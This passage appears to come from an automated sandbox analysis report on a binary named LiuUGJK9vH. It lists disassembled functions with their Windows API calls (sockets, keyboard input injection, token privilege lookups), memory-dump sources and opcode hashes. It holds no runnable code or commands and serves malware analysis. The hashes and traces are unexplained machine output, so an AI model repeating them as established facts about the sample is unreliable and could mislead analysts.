                      • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                      Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$AllocClearCopyInitString
                      • String ID:
                      • API String ID: 2808897238-0
                      • Opcode ID: 126b7732d1169b0daeb476a90690a6342f420379eaa699d7f5cc7697427e96b0
                      • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                      • Opcode Fuzzy Hash: 126b7732d1169b0daeb476a90690a6342f420379eaa699d7f5cc7697427e96b0
                      • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                      Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                      Download Yara Rule
                      APIs
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                      • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                      • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$__itow__swprintfsocket
                      • String ID:
                      • API String ID: 2214342067-0
                      • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                      • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                      • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                      • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                      Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                      Download Yara Rule
                      APIs
                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                      • _strlen.LIBCMT ref: 004764D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID:
                      • API String ID: 4218353326-0
                      • Opcode ID: 950d12a2ce6679dc4d89bdad0c15c89ad0c0cc2934a651e97078b378a34254de
                      • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                      • Opcode Fuzzy Hash: 950d12a2ce6679dc4d89bdad0c15c89ad0c0cc2934a651e97078b378a34254de
                      • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                      Function 02F934FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 02F9354C
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02F935D5
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02F935E7
                      • __freea.LIBCMT ref: 02F935F0
                        • Part of subcall function 02F932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F9332C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: e7c376159dde463744b13bef63d8b749db7005f3363a934d67400fba8110fabc
                      • Instruction ID: b36b6a2101437b6a10d23e623d7402384cee9b52ea81ebd59016f5fbb7cf1962
                      • Opcode Fuzzy Hash: e7c376159dde463744b13bef63d8b749db7005f3363a934d67400fba8110fabc
                      • Instruction Fuzzy Hash: B731D272E0020AABEF259F65DC44DAF7BA5EF44394F0541A9ED04D7250EB35C994CF90
                      Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                      Download Yara Rule
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                      • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                      • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                      • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                      Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                      Download Yara Rule
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 0048AB60
                      • GetWindowRect.USER32(?,?), ref: 0048ABD6
                      • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                      • MessageBeep.USER32(00000000), ref: 0048AC57
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                      • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                      • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                      • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                      Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                      • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                      • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                      • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                      Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00460C66
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                      • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00460D33
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                      • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                      • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                      • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                      Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                      • __isleadbyte_l.LIBCMT ref: 00436229
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                      • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                      • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                      • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                      Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32 ref: 00484F02
                        • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                        • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                        • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                      • GetCaretPos.USER32(?), ref: 00484F13
                      • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                      • GetForegroundWindow.USER32 ref: 00484F54
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                      • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                      • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                      • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                      Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • GetCursorPos.USER32(?), ref: 0048C4D2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                      • GetCursorPos.USER32(?), ref: 0048C534
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                      • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                      • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                      • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                      Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                        • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                        • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                        • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                        • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                      • _memcmp.LIBCMT ref: 004586C6
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                      • HeapFree.KERNEL32(00000000), ref: 00458703
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                      • String ID:
                      • API String ID: 1592001646-0
                      • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                      • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                      • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                      • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                      Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                      Download Yara Rule
                      APIs
                      • __setmode.LIBCMT ref: 004209AE
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                      • _fprintf.LIBCMT ref: 004209E5
                      • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                        • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                      • __setmode.LIBCMT ref: 00420A1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                      • String ID:
                      • API String ID: 521402451-0
                      • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                      • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                      • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                      • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                      Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00435101
                        • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                        • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                        • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                      • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                      • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                      • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                      Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 004044CF
                        • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                        • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                        • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                      • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
